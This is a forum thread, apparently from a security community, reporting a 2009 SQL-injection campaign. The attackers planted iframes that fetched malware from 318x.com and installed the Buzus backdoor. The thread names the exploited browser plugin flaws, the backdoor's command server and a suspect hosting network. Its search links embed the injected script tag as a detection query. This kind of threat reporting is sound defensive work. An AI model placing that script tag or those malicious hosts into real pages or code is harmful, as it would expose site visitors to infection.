Recently a few hundred thousand webpages with driveby exploit malware found..

[polonus]

Hi malware fighters,

Just recently more than 150.000 webpages have been hacked through SQL-injection to place an iframe that will try to infest visitors with malicious software. Mentioned iframes will download the first part of the malware from domain 318x.com, and then downloads through various redirects and iframes other malcode. According to ScanSafe's Mary Landesman this is a "work-in-progress" attack and the malcreants are continuously adapting and changing the malcode. Remarkably so no PDF exploits are being used, but a plethora of Adobe Flash, MDAC ADODB.Connection ActiveX, Microsoft Office Web Components, Microsoft video ActiveX and Internet Explorer Uninitialized Memory Corruption holes.

If one of the exploits works, then backdoor Buzus.croo is installed from windowssp.7766.org. This backdoor will connect through port 80 to IP-address 121.14.136.5 to send a POST request to ns.winsdown.com.cn/Countdown/count.asp. The Buzus family of malcode as a rule is being herded through IRC bestuurd and used for creditcard theft to plunder bank-accounts. The number of infested pages seems unclear, according to Google they are over 150.000 pages, while Yahoo counts up to 300.000 hacked webpages.
 Re:
http://blog.scansafe.com/journal/2009/12/9/318x-sql-injection-claims-125000.html

http://www.google.nl/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=dd9&q=%3Cscript+src%3Dhttp%3A%2F%2F318x.com%3E&aq=f&oq=&aqi=

http://search.yahoo.com/search;_ylt=A0geu9aIQiFLMcIA38JXNyoA?p=%3Cscript+src%3Dhttp%3A%2F%2F318x.com%3E&fr2=sb-top&fr=yfp-t-701&sao=0

polonus

[YoKenny]

BlueConnex/EuroConnex (AS29550): Riccom LTD (91.212.107.*, AS49038, riccom-cy.org)
http://hphosts.blogspot.com/2009/12/blueconnexeuroconnex-as29550-riccom-ltd.html